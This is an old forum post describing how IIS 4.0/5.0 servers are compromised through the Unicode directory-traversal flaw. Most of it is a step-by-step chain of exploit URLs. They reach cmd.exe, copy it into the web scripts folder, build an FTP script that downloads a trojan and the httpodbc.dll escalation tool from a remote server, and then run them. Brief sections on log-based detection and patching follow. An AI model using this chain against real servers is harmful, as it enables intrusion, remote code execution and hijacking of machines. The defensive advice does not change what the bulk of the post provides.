I had to add quotes and such because this BBS is messing with some stuff......

i will try my best to use complete sentences like i learned in 3rd grade.

I KNOW THIS IS AN OLD VULN, BUT MANY MANY MACHINES ARE STILL HACKED THIS WAY, SO IM POSTING IT. please patch yourselfs....


disclamer : none of this information is to be used out of context, i am not responsible for how you use it, or what your mind choices to do with it. futhermore, its educational, and for that purpose only.

First i will start with how it is done, then how it is used, then how to defend, and lastly, how to fix.

The first step in hacking of iis unicode vuln machines, those vulnerable to the ../../..%255c../winnt/system32/cmd.exe type vulns, is finding them. Usually this is done by a custom scanner, or someone using other systems. The scanner starts by identifying the host computer, which usually uses random hosts and marks which ones return IIS 4.0 and IIS 5.0. After this part of the scan is complete, each host is scanned for some 200 unicode vuln's. Depending on which one's they find, will depend on how they are exploited. So, lets get into it.

Lets say your doing this on yourself...(your the attacker)

http://127.0.0.1/

after you scan for vuln unicode strands, you see yourself as being vuln to

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe

which means your system is not secure against the unicode directory transversal and thus you can access a cmd prompt through it. At this point, the attacker, (i will refrain from using hacker, because it is hardly), will do a basic call of cmd.exe, something like


http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+dir+c:\

which would display the contents of your C:\ drive.

next, the attacker(you) would create your own copy of cmd.exe, so you dont have to deal with copy attribute problems.

something like...

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe

Next, there are two different ways to get the files they want onto your computer, one is too simple to explain, which is by using the tftp.exe service and remotly downloading off an tftp server. But it is not the most popular, for the simple reason it is harder to setup.

Instead the next thing the attacker will do is create an ftp script to download files for you. usinng the echo commands, we create an ftp script.

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt

temp ftp being the ftp on which the files lay, 21 being the port

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+login+>>+C:\inetpub\scripts\temp.txt

login=ftp login info

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+password>>+C:\inetpub\scripts\temp.txt

password=ftp pass info

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+temp.zip+>>+C:\inetpub\scripts\temp.zip

downloading the trojan bot file.

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+httpodbc.dll+>>+C:\inetpub\scripts\temp.txt

httpodbc.dll is a common priv escalation priv exploit

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+exit+>>+C:\inetpub\scripts\temp.txt

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+quit+>>+C:\inetpub\scripts\temp.txt

must quit and exit, or else proc hangs

then, to send the command to download, simple use...

http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+ftp.exe+-s:C:\inetpub\scripts\temp.txt

and ftp.exe will use your script and download all your files.

Next, the attacker will logon to wherever they have placed their files, in our case, C:\inetpub\scripts\temp.txt, the file must be accessable by the web..., but most are...

http://127.0.0.1/scripts/httpodbc.dll

they enter in their command to run,, in our case

C:\inetpub\scripts\temp.zip (can be an exe if self extracting)

httpodbc.dll returns with a positive and reporting that privs were escalated for the execution.

This computer can now be completly controled and used however the attacker wants, some iis servers run connected to t3 as well, so lots of bw wasting.

i wont go into anymore about how they are hacked for fear of being banned...
i will answer more indepth questions in priv messages...



Catching The attack:

Easyest way to prevent this attack, is simple updates, which some dont use. There are many fixes for this problem, but still thousands of machines are attacked. If you notice your computer moving very slow, or using unusual ammounts of bandwidth. Another way, if you want to backtrack and see when you were attacked, look into the iis logs for anything resembling

Get /.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe 200

if it is a 404 instead of a 200, then you are fine, a 200 simply means it returned positive.



What the hell are these used for?:

The most common thing these machines are used for is serving warez/porn. I have seen other, more sophisitcated things, such as bnc's, tunnels, irc servers, FXP servers, e-mail hosts, and just about as much as you can imagine.


The most secure way to fix this problem, if you arnt infected, update, if you are, you most likly need to clean your whole system. Treat it as any other compromise.


BOTTOM LINE:

Please upgrade this stuff, its been out for almost 2 years, and im getting tired of seeing them online,, just because your behind a firewall, doesnt mean your safe from lame old attacks either....